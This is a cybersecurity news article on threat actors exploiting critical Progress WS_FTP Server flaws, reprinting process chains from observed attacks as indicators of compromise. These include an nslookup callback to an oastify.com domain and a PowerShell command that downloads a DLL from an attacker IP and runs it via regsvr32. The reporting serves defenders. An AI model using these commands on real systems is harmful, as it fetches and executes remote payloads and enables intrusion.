Friday, November 1, 2024
HomeCyber Security NewsExploitation of Critical WS_FTP Server Flaw Spotted in the Wild

Exploitation of Critical WS_FTP Server Flaw Spotted in the Wild

Published on

Malware protection

As previously reported, Progress-owned WS_FTP was discovered with multiple vulnerabilities associated with cross-site scripting (XSS), SQL injection, cross-site request forgery, unauthenticated user enumeration, and a few others.

Progress has warned their users about the WS_FTP vulnerabilities and released a security advisory mentioning the fixed version of the WS_FTP server. Additionally, they have also requested their users to upgrade to the latest version.

Vulnerabilities Exploited in the Wild

According to the reports shared with Cyber Security News, these vulnerabilities were discovered to be exploited by threat actors in the wild. On investigating further, the exploit chain of execution was found to be the same across all the observed instances.

- Advertisement - SIEM as a Service
Document
FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

It was also mentioned that this could mean that there has been a mass exploitation of the vulnerable WS_FTP servers. The collected logs also consisted of one particular burp suite domain on all the recorded incidents which means that a single threat actor is doing the mass exploitation.

However, all the execution chain of commands has been listed below.

Great-grandparent Process:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\ryvjavth.cmdline

Parent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

As per the reports, the Attack chain had the below command executions.

Great-grandparent Process:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Parent Process:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Child Process:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Furthermore, a complete report has been published by Rapid7, which provides detailed information about the recorded incidents, mitigations, and other information.

“We have responsibly disclosed these vulnerabilities in conjunction with the researchers at Assetnote and have released a fix for each. Currently, we have not seen any indication that these vulnerabilities were exploited before we released the patch. Progress encourages our customers to upgrade to our software’s patched version as soon as possible. Security is of the utmost importance to us, and leveraging development best-practices to minimize product vulnerabilities is an integral part of our security program,” Statement from Progress Spokesperson.

Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.

Eswar
Eswar
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Latest articles

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

ATPC Cyber Forum to Focus on Next Generation Cybersecurity and Artificial Intelligence Issues

White House National Cyber Director, CEOs, Key Financial Services Companies, Congressional and Executive Branch...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

LightSpy iOS Malware Enhanced with 28 New Destructive Plugins

The LightSpy threat actor exploited publicly available vulnerabilities and jailbreak kits to compromise iOS...

New PySilon RAT Abusing Discord Platform to Maintain Persistence

Cybersecurity experts have identified a new Remote Access Trojan (RAT) named PySilon. This Trojan...

Konni APT Hackers Attacking Organizations with New Spear-Phishing Tactics

The notorious Konni Advanced Persistent Threat (APT) group has intensified its cyber assault on...